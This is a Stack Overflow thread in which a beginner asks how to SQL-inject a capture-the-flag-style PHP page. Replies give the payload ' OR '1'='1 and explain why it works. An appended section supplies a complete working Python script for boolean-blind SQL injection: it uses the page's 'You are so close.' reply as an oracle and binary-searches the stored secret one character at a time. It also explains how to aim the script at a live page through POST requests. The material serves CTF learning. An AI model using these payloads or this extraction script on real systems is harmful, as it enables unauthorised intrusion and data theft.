
Just a quick question since I am not experienced in this field at all. How would I do an SQL injection on this? I would like examples of SQL injection. Please don't comment to just type ' or '1' = '1 as that won't work. All it will reply with is the sentence from the elseif statement saying "You are so close."

<?php
  include "config.php";   // expected to define $database_file, $CANARY and $FLAG
  ini_set('error_reporting', E_ALL);
  ini_set('display_errors', 'On');

  $answer = $_POST["answer"];
  $debug = $_POST["debug"];   // read but never used below
  // Untrusted POST data is interpolated straight into the SQL string: this is the injection point.
  $query = "SELECT * FROM answers WHERE answer='$answer'";
  echo "<pre>";
  echo "SQL query: ", htmlspecialchars($query), "\n";
  echo "</pre>";
?>
<?php
  $con = new SQLite3($database_file);
  $result = $con->query($query);

  $row = $result->fetchArray();
  // The flag is gated by a plain PHP comparison against $CANARY, not by the query.
  // The query result only decides between "You are so close." and "Wrong.".
  if($answer == $CANARY)  {
    echo "<h1>Perfect!</h1>";
    echo "<p>Your flag is: $FLAG</p>";
  }
  elseif ($row) {
    echo "<h1>You are so close.</h1>";
  } else {
    echo "<h1>Wrong.</h1>";
  }
?>

How would I do an injection on this query? Please don't mark this as a duplicate of that major post that I have already read. That post isn't the same as this query from what I've tried.

  • $answer = `' OR '1' = '1` – Madhur Bhaiya Oct 06 '18 at 10:30
  • Welcome to StackOverflow! I suggest visiting [How to Ask](https://stackoverflow.com/help/how-to-ask) in order to get a better insight on how to ask a solid question. StackOverflow is not a coding service, what have you tried and where did it fail? – nijm Oct 06 '18 at 10:31
  • I know this is old, but why are you trying to perform SQL injection? Are you security testing your code or something? –  Mar 26 '19 at 01:32

1 Answer


Just send the following string in $_POST["answer"]:

$_POST["answer"] = "' OR '1' = '1";
$answer = $_POST["answer"];
$query = "SELECT * FROM answers WHERE answer='$answer'";

Now, your query will read as follows:

SELECT * FROM answers WHERE answer='' OR '1' = '1'

It will give you all the rows from the answers table. If you use the results of this SQL query to check whether the answer given by a user is correct or not, you will always get some rows, hence the answer will always pass no matter what.

Similarly, for example, one can get the details of all the customers, their phone numbers, email addresses, etc., if one passes customer_id = "' OR '1' = '1"

Do read this thread completely: How does the SQL injection from the "Bobby Tables" XKCD comic work?

Madhur Bhaiya
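Added example, not part of the question or the answer above. The posted page does not hand out the flag when the query returns rows: the flag branch is a PHP comparison of $answer against $CANARY, so `' OR '1' = '1` can only ever reach the "You are so close." branch. What the injection does give you is a yes/no oracle ("You are so close." when the injected condition selects a row, "Wrong." when it does not), and that is enough to read the stored answer out of the database one character at a time and then submit it unchanged. The code below mirrors the PHP logic against an in-memory SQLite database with constructed data and runs the extraction against it. Assumptions: the string stored in the `answers` table is the same one $CANARY holds, it sits in the first row (rowid 1), and it is printable ASCII; the helpers `find_int`, `extract_answer`, `oracle` and `challenge` are names chosen here, and the SQLite built-ins used are length(), substr(), unicode() and the implicit rowid.

```python
import sqlite3

# Constructed stand-in for the values config.php would provide. Assumption: the
# answer stored in the `answers` table is the same string that $CANARY holds.
CANARY = "pelican42"
FLAG = "FLAG{constructed-example}"


def make_db():
    """Build an in-memory SQLite database shaped like the challenge's (constructed data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE answers (answer TEXT)")
    con.execute("INSERT INTO answers (answer) VALUES (?)", (CANARY,))
    con.commit()
    return con


def challenge(con, answer):
    """Mirror of the PHP page: same string-built query, same three branches."""
    query = f"SELECT * FROM answers WHERE answer='{answer}'"
    try:
        row = con.execute(query).fetchone()
    except sqlite3.Error:
        # The PHP page would print an error here instead; treat it as no row.
        row = None
    if answer == CANARY:
        return "Perfect!", FLAG
    if row:
        return "You are so close.", None
    return "Wrong.", None


def oracle(con, payload):
    """One yes/no question: did the injected condition select a row?"""
    return challenge(con, payload)[0] == "You are so close."


def find_int(con, expr, lo, hi):
    """Binary-search the integer value (within lo..hi inclusive) of SQLite
    expression `expr` on the first row. The query becomes
    answer='' OR (rowid=1 AND expr>mid AND '1'='1'), so with no empty answer
    stored only the injected conjunct can select a row."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(con, f"' OR rowid=1 AND {expr}>{mid} AND '1'='1"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_answer(con, max_len=64):
    """Recover the stored answer character by character. Assumes printable ASCII
    (code points 32..126); uses SQLite's length(), substr() and unicode() so no
    quote characters are needed inside the payload."""
    length = find_int(con, "length(answer)", 0, max_len)
    recovered = ""
    for pos in range(1, length + 1):
        code = find_int(con, f"unicode(substr(answer,{pos},1))", 32, 126)
        recovered += chr(code)
    return recovered


if __name__ == "__main__":
    con = make_db()
    print(challenge(con, "' OR '1'='1"))   # ('You are so close.', None)
    secret = extract_answer(con)
    print(secret)                           # pelican42
    print(challenge(con, secret))           # ('Perfect!', 'FLAG{constructed-example}')
```

Against the live page, `oracle` would be a POST of the payload in the `answer` field followed by a check for "You are so close." in the response body; the binary search costs about seven requests per character plus a handful for the length. If the table holds several rows, pin the one you want with its rowid (the example uses rowid 1) so the conjuncts cannot be satisfied by different rows.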